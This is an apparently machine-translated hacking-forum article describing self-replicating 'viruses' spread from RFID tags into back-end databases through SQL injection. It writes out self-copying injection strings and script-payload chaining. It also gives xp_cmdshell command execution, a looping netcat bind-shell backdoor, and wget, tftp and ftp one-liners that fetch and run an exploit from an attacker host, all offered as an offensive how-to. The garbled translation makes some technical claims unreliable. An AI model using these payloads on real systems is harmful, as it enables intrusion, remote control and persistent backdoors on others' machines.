Virus in RFID hacking, structure.
{Introduction}
In this article, an addition, on the topic of RFID-hacking. The basics and the beginning are set out in the first article at: http://forum.antichat.ru/thread123511.html. From which we learned that RFID is a Radio Frequency IDentification method for remotely storing and receiving information by transmitting radio signals using devices called RFID tags.
{About parasites}
The main functions of the virus in this type of attack are self-copying, and execution of arbitrary code. For these purposes, the parasite usually uses a database. Details depend on the database that is being used. In general, we can distinguish two classes of viruses in this type of attack: the first uses arbitrary queries in the database, the second one is implemented using quines (special program).
The arbitrary code that a virus can execute depends on the mechanisms of the database response to SQL injections.
{SQL injection}
In administration systems, the method of querying RFID tags from the database is usually used, with the subsequent return of data, which in turn can be copied in the correct sequence. So copy the tags themselves if there are certain factors.
At the moment, you can consider two types of viruses, the first is a single request program and the second is the use of multiple requests.
The first type of virus, uses a minimum of space, and in its structure can not carry a combat load. And it is used only for input of already planned information into the database. A virus that uses multiple requests on the contrary is already created to infect the systems of autoindication, and entering malicious code or other combat load. Most often the second method is used, but for correct operation, this type of virus, it is required that some conditions in the database are properly observed, and this is to ensure the function of the GetCurrentQuery-style function, for access. This is necessary to avoid an error, because this API fitcha allows you to enter a comment. (I hasten to reassure you, these functions are initially included in the default systems)
Specific attacks can be performed when the database has made a query in the label, and she responded with such content
UPDATE ContainerContents SET OldContents = '% contents%' WHERE TagID = '% id%'
Here, the variables contents and id
If this request passes without errors, then the attacker can change the request at his discretion with the help of our favorite quote (''). And what can I do, ??? And this is to add just a one-shot copy to the NewContents area and infect other systems in the same way.
Here's about what we need:
Apples', NewContents=SUBSTR(GetCurrentQuery (),43,57) – UPDATE ContainerContents SET OldContents='Apples', NewContents=SUBSTR(GetCurrentQuery (),43,57) -- WHERE TagId='123' Instead of just updating the OldContents area, the query now also updates the NewContents scope. Using the SQL comment (-), all rows will be moved to the database. That opens up new possibilities for the attacker.
Inserting malicious code.
In the above-described injection technology, it is impossible to execute any code other than queries into the database. However, when enabled from the client side of the script, the server automatically becomes vulnerable. Scripts can be inserted after the comment, so that the database system ignores them.
The only thing to consider is that when you include the code in the exploit, you need to take into account the third parameter SUBSTR which should match the length of the exploit.
Apples', NewContents=SUBSTR(GetCurrentQuery (),43,73) --<script>...</script> In a more serious version with the use of variables, and inserts not only some specific squeaks it will look like this:
Apples'; UPDATE ContainerContents SET NewContents=NewContents || ''';' || GetCurrentQuery () || ';%payload%; --';%payload% -- Here the malicious code should be worked twice, Ie for the first time, it is self-copying to the database, the second time is the fulfillment of itself.
At the moment, the comment feature is present in the Oracle (OCI / iSQL * Plus) This provides the functionality of the GetCurrentQuery-style, with subsequent administrator privileges.PostgreSQL, MySQL and SQL Server also allow comments and multiple injection requests. Here also the functionality of the GetCurrentQuery-style is present. However, for PostgreSQL and SQL Server, no reliable working viruses have been created yet, everything was limited only by trial development.
{Some examples of malicious code being injected}
System management functions provided by databases can be used to cause problems. For example, the Microsoft SQL Server provides a CLOSE function that allows the database to be private from SQL.
Reading Data from the Database
UPDATE ContainerContents SET OldContents='%contents%' WHERE TagID='%id%' data in the query below can be used for direct queries to the database. '|| (SELECT ...) ||' In this case, the quotes execute an SQL injection and cause the data to be interpreted as a code. || The operator performs a sequence link, causing the result of the SELECT query to be added to the region in the database. A sequence communication operator is required, in order to nitrate the comment that is our favorite quotes.
{Execute Shell commands via SQL injection}
The SQL server provides an xp_cmdshell procedure that allows malicious and not very, commands to be executed.
EXEC Master..xp_cmdshell 'commands'; {Installing backdoors on the system}
To rip-off the system, we need the following commands
netcat -lp1234|sh Where the 1234 port will be listened.
But here we are trapped by the danger established and properly configured by the firewall or brandmauer. And then there is the solution, run the code in an infinite loop, so that it works like a daemon, which in itself allows you to create a more advanced back-end.
screen -dmS t bash -c"while [ true ]; do netcat -lp1234|sh; done {Other features}
There are also useful fitchi, for example wget.Test file download over the network, and file storage in the system.
wget http://ip/myexploit -O /tmp/myexploit; chmod +x /tmp/myexploit; /tmp/myexploit Wget is not normally available on Windows systems. In this case, you need to use tftp
tftp -i ip GET myexploit.exe & myexploit You can also create a text file, as they say on the fly, using the echo function
echo anonymous & echo BIN & echo GET myexploit.exe & echo quit) > ftp.txt & ftp -s:ftp.txt ip & myexploit {Conclusion}
This article describes the penetration into a vulnerable system by means of programming RFID tags. Of course, of course, I must warn that all the material presented is only for reference. In view of the complexity of the implementation of technology, namely the creation of the label itself and programming it with malicious intent, it seems to me through a difficult for the common man. So I warn people who are knowledgeable but who are idle, do not check this information in practice.
Comments
When commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.